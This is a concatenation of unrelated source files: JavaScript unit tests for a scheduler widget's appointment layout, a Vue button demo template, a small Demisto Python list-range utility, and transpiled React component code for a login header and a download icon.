$element = $(this.instance.$element()); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).eq(0).outerHeight(); const pointer = pointerMock($element.find('.dx-resizable-handle-top').eq(0)).start(); pointer.dragStart().drag(0, -cellHeight * 5).dragEnd(); const $appointment = $element.find('.' + APPOINTMENT_CLASS).eq(0); assert.roughEqual($appointment.position().top, 500, 1.1, 'Correct top coordinate'); assert.equal($appointment.outerHeight(), cellHeight * 6, 'Correct height'); }); QUnit.test('Appointment inside vertical grouped view should have a right resizable area in Day view', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 16, 14), endDate: new Date(2018, 2, 16, 15), id: 1 }], currentDate: new Date(2018, 2, 16), views: [{ type: 'day', groupOrientation: 'vertical' }], currentView: 'day', groups: ['id'], editing: true, resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], startDayHour: 12, endDayHour: 16, showAllDayPanel: false }); const $appointment = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS).first(); const initialResizableAreaTop = $appointment.dxResizable('instance').option('area').top; const initialResizableAreaBottom = $appointment.dxResizable('instance').option('area').bottom; assert.equal($appointment.dxResizable('instance').option('area').top, initialResizableAreaTop); assert.equal($appointment.dxResizable('instance').option('area').bottom, initialResizableAreaBottom); }); QUnit.test('Appointment before startDayHour part should be rendered correctly in vertical grouped workspace Week, first group, showAllDayPanel = true', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 1, startDate: new Date(2018, 4, 21, 7), endDate: new Date(2018, 4, 21, 11, 30) }, { text: '2', id: 2, startDate: new Date(2018, 4, 21, 7), endDate: new Date(2018, 4, 21, 11, 30) } ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 16, cellDuration: 60, showAllDayPanel: true, width: 2000 }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointment parts are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); const cellWidth = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerWidth(); const dateTableLeftOffset = 200; assert.roughEqual($appointments.eq(0).position().top, cellHeight, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(0).outerHeight(), cellHeight * 2.5, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(0).position().left, cellWidth + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); assert.roughEqual($appointments.eq(1).position().top, cellHeight * 9, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(1).outerHeight(), cellHeight * 2.5, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(1).position().left, cellWidth + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); }); QUnit.test('Appointment after endDayHour part should be rendered correctly in vertical grouped workspace Week, first group, showAllDayPanel = true', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 1, startDate: new Date(2018, 4, 21, 15), endDate: new Date(2018, 4, 21, 17) }, { text: '2', id: 2, startDate: new Date(2018, 4, 21, 15), endDate: new Date(2018, 4, 21, 17) } ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 16, cellDuration: 60, showAllDayPanel: true, width: 2000 }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointment parts are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); const cellWidth = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerWidth(); const dateTableLeftOffset = 200; assert.roughEqual($appointments.eq(0).position().top, cellHeight * 7, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(0).outerHeight(), cellHeight, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(0).position().left, cellWidth + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); assert.roughEqual($appointments.eq(1).position().top, cellHeight * 15, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(1).outerHeight(), cellHeight, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(1).position().left, cellWidth + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); }); QUnit.test('Appointment starting on previous week should be rendered correctly in vertical grouped workspace Week, first group, showAllDayPanel = true', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 1, startDate: new Date(2018, 4, 19, 15), endDate: new Date(2018, 4, 20, 11) }, { text: '2', id: 2, startDate: new Date(2018, 4, 19, 15), endDate: new Date(2018, 4, 20, 11) } ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 16, cellDuration: 60, showAllDayPanel: true, width: 2000 }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointment parts are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); const dateTableLeftOffset = 200; assert.roughEqual($appointments.eq(0).position().top, cellHeight, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(0).outerHeight(), cellHeight * 2, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(0).position().left, dateTableLeftOffset, 1.1, 'correct left position of appointment part'); assert.roughEqual($appointments.eq(1).position().top, cellHeight * 9, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(1).outerHeight(), cellHeight * 2, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(1).position().left, dateTableLeftOffset, 1.1, 'correct left position of appointment part'); }); QUnit.test('Long appointments should be rendered correctly in vertical grouped workspace Week, first group, showAllDayPanel = true (T714290)', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 1, startDate: new Date(2018, 4, 21, 15), endDate: new Date(2018, 4, 22, 11, 30) } ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 16, cellDuration: 60, showAllDayPanel: true, width: 2000 }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointment parts are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); const cellWidth = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerWidth(); const dateTableLeftOffset = 200; assert.roughEqual($appointments.eq(0).position().top, 7 * cellHeight, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(0).outerHeight(), cellHeight, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(0).position().left, cellWidth + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); assert.roughEqual($appointments.eq(1).position().top, cellHeight, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(1).outerHeight(), cellHeight * 2.5, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(1).position().left, cellWidth * 2 + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); }); QUnit.test('Long appointments should be rendered correctly in vertical grouped workspace Week, second group, showAllDayPanel = true (T714290)', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 2, startDate: new Date(2018, 4, 21, 15), endDate: new Date(2018, 4, 22, 11, 30) } ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 16, cellDuration: 60, showAllDayPanel: true, width: 2000 }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointment parts are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); const cellWidth = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerWidth(); const dateTableLeftOffset = 200; assert.roughEqual($appointments.eq(0).position().top, 15 * cellHeight, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(0).outerHeight(), cellHeight, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(0).position().left, cellWidth + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); assert.roughEqual($appointments.eq(1).position().top, 9 * cellHeight, 1.5, 'correct top position of appointment part'); assert.roughEqual($appointments.eq(1).outerHeight(), cellHeight * 2.5, 2, 'correct size of appointment part'); assert.roughEqual($appointments.eq(1).position().left, cellWidth * 2 + dateTableLeftOffset, 1.1, 'correct left position of appointment part'); }); QUnit.test('Scheduler recurrent appointments render right if began before startDayHour (T735635)', function(assert) { const appointments = [ { text: 'Website Re-Design Plan', startDate: new Date(2019, 3, 22, 7, 30), endDate: new Date(2019, 3, 22, 11, 30), recurrenceRule: 'FREQ=DAILY' } ]; const options = { dataSource: appointments, views: ['week', 'month'], currentView: 'week', startDayHour: 10, endDayHour: 16, height: 600, currentDate: new Date(2019, 3, 21), }; const scheduler = createInstance(options); const initialAppointmentHeight = scheduler.appointments.getAppointmentHeight(0); const recurrentAppointmentHeight = scheduler.appointments.getAppointmentHeight(1); assert.equal(initialAppointmentHeight, recurrentAppointmentHeight, 'Appointment cells have equal heights (both initial and recurrent)'); }); });
/* * @Author: daidai * @Date: 2022-03-04 16:46:05 * @LastEditors: daidai * @LastEditTime: 2022-03-30 18:24:05 * @FilePath: \yhht-ui\src\views\com\button\button.js */ export default { text:`<div class="row"> <yh-button>默认按钮</yh-button> <yh-button theme="primary">主要按钮</yh-button> <yh-button theme="danger">危险按钮</yh-button> <yh-button theme="warning">警告按钮</yh-button> <yh-button theme="success">成功按钮</yh-button> </div> <div class="row"> <yh-button disabled shape="round">禁用按钮</yh-button> <yh-button theme="primary" disabled shape="round">禁用主要</yh-button> <yh-button theme="danger" disabled shape="round">禁用危险</yh-button> <yh-button theme="warning" disabled shape="round">禁用警告</yh-button> <yh-button theme="success" disabled shape="round">禁用成功</yh-button> </div> <div class="row"> <yh-button loading>默认按钮</yh-button> <yh-button theme="primary" loading>主要按钮</yh-button> <yh-button theme="danger" loading>危险按钮</yh-button> <yh-button theme="warning" loading>警告按钮</yh-button> <yh-button theme="success" loading>成功按钮</yh-button> </div> <div class="row"> <yh-button variant="text">文字按钮</yh-button> <yh-button theme="primary" variant="text">禁用主要</yh-button> <yh-button theme="danger" variant="text">禁用危险</yh-button> <yh-button theme="warning" variant="text">禁用警告</yh-button> <yh-button theme="success" variant="text">禁用成功</yh-button> </div> <div class="row"> <yh-button variant="text" disabled>文字按钮</yh-button> <yh-button theme="primary" variant="text" disabled>禁用主要</yh-button> <yh-button theme="danger" variant="text" disabled>禁用危险</yh-button> <yh-button theme="warning" variant="text" disabled>禁用警告</yh-button> <yh-button theme="success" variant="text" disabled>禁用成功</yh-button> </div> `, sharpSize:` <div class="row"> <yh-button size="small">小按钮</yh-button> <yh-button>默认按钮</yh-button> <yh-button size="large">大按钮</yh-button> </div> <div class="row"> <yh-button size="small" shape="round">小按钮</yh-button> <yh-button shape="round">默认按钮</yh-button> <yh-button size="large" shape="round">大按钮</yh-button> </div> <div class="row"> <yh-button size="small" shape="circle">小</yh-button> <yh-button shape="circle">中</yh-button> <yh-button size="large" shape="circle">大</yh-button> </div>`, otlineDashed:` <div class="row"> <yh-button variant="outline">实线按钮</yh-button> <yh-button theme="primary" variant="outline">禁用主要</yh-button> <yh-button theme="danger" variant="outline">禁用危险</yh-button> <yh-button theme="warning" variant="outline">禁用警告</yh-button> <yh-button theme="success" variant="outline">禁用成功</yh-button> </div> <div class="row"> <yh-button variant="outline" disabled>实线禁用</yh-button> <yh-button theme="primary" variant="outline" disabled>禁用主要</yh-button> <yh-button theme="danger" variant="outline" disabled>禁用危险</yh-button> <yh-button theme="warning" variant="outline" disabled>禁用警告</yh-button> <yh-button theme="success" variant="outline" disabled>禁用成功</yh-button> </div> <div class="row"> <yh-button variant="dashed">虚线按钮</yh-button> <yh-button theme="primary" variant="dashed">禁用主要</yh-button> <yh-button theme="danger" variant="dashed">禁用危险</yh-button> <yh-button theme="warning" variant="dashed">禁用警告</yh-button> <yh-button theme="success" variant="dashed">禁用成功</yh-button> </div> <div class="row"> <yh-button variant="dashed" disabled>虚线禁用</yh-button> <yh-button theme="primary" variant="dashed" disabled>禁用主要</yh-button> <yh-button theme="danger" variant="dashed" disabled>禁用危险</yh-button> <yh-button theme="warning" variant="dashed" disabled>禁用警告</yh-button> <yh-button theme="success" variant="dashed" disabled>禁用成功</yh-button> </div>`, block:` <div class="block_wrap"> <yh-button theme="primary" block>主要按钮</yh-button> <yh-button theme="success" variant="outline" block>禁用成功</yh-button> <yh-button theme="warning" variant="dashed" block>禁用警告</yh-button> <yh-button theme="danger" variant="text" block>禁用危险</yh-button> <yh-button theme="primary" block size="small" shape="round">主要小按钮</yh-button> <yh-button theme="primary" block loading shape="round">主要默认按钮</yh-button> <yh-button theme="primary" block size="large" loading shape="round">主要大按钮</yh-button> </div> <style lang='scss' scoped> .block_wrap { display: flex; flex-wrap: wrap; row-gap: 16px; column-gap: 16px; } ` }
import traceback import demistomock as demisto from CommonServerPython import * def get_range_command(indexes: List[str], val: List[Any]) -> List[Any]: """ Filter list with a given range. Args: indexes (list): indexes to filter. val (list): list to filter . Returns: filtered list. """ result = [] for index in indexes: if '-' in str(index): start, end = index.split('-') start = int(start) if start else 0 end = int(end) if end else len(val) for element in val[start:end + 1]: result.append(element) else: result.append(val[int(index)]) return result def main(): try: args = demisto.args() val = safe_load_json(args.get('value', '')) indexes = argToList(args.get('range', '')) return_results(results=get_range_command(indexes, val)) except Exception as ex: demisto.error(traceback.format_exc()) # print the traceback return_error(f'Failed to execute GetRange. Error: {str(ex)}') if __name__ in ('__main__', '__builtin__', 'builtins'): main()
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; var _react = _interopRequireDefault(require("react")); var _reactRedux = require("react-redux"); var _reducer = require("./reducer"); require("./Header.css"); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _typeof(obj) { if (typeof Symbol === "function" && typeof Symbol.iterator === "symbol") { _typeof = function _typeof(obj) { return typeof obj; }; } else { _typeof = function _typeof(obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; }; } return _typeof(obj); } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); return Constructor; } function _possibleConstructorReturn(self, call) { if (call && (_typeof(call) === "object" || typeof call === "function")) { return call; } return _assertThisInitialized(self); } function _assertThisInitialized(self) { if (self === void 0) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return self; } function _getPrototypeOf(o) { _getPrototypeOf = Object.setPrototypeOf ? Object.getPrototypeOf : function _getPrototypeOf(o) { return o.__proto__ || Object.getPrototypeOf(o); }; return _getPrototypeOf(o); } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function"); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, writable: true, configurable: true } }); if (superClass) _setPrototypeOf(subClass, superClass); } function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf || function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); } var Header = /*#__PURE__*/ function (_React$Component) { _inherits(Header, _React$Component); function Header() { _classCallCheck(this, Header); return _possibleConstructorReturn(this, _getPrototypeOf(Header).apply(this, arguments)); } _createClass(Header, [{ key: "render", value: function render() { var _this = this; return _react.default.createElement("header", { className: "Header" }, _react.default.createElement("h4", null, "Connected component from my-private-package"), this.props.isLoggedIn ? _react.default.createElement("p", null, this.props.username, _react.default.createElement("button", { onClick: function onClick() { return _this.props.logout(); } }, "logout")) : _react.default.createElement("p", null, _react.default.createElement("button", { onClick: function onClick() { return _this.props.login(); } }, "login"))); } }]); return Header; }(_react.default.Component); var mapStateToProps = function mapStateToProps(state) { return { isLoggedIn: state.header.isLoggedIn, username: state.header.username }; }; var mapDispatchToProps = { login: _reducer.login, logout: _reducer.logout }; var _default = (0, _reactRedux.connect)(mapStateToProps, mapDispatchToProps)(Header); exports.default = _default;
'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _react = require('react'); var _react2 = _interopRequireDefault(_react); var _pure = require('recompose/pure'); var _pure2 = _interopRequireDefault(_pure); var _svgIcon = require('../../svg-icon'); var _svgIcon2 = _interopRequireDefault(_svgIcon); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } var FileFileDownload = function FileFileDownload(props) { return _react2.default.createElement( _svgIcon2.default, props, _react2.default.createElement('path', { d: 'M19 9h-4V3H9v6H5l7 7 7-7zM5 18v2h14v-2H5z' }) ); }; FileFileDownload = (0, _pure2.default)(FileFileDownload); FileFileDownload.displayName = 'FileFileDownload'; exports.default = FileFileDownload; module.exports = exports['default'];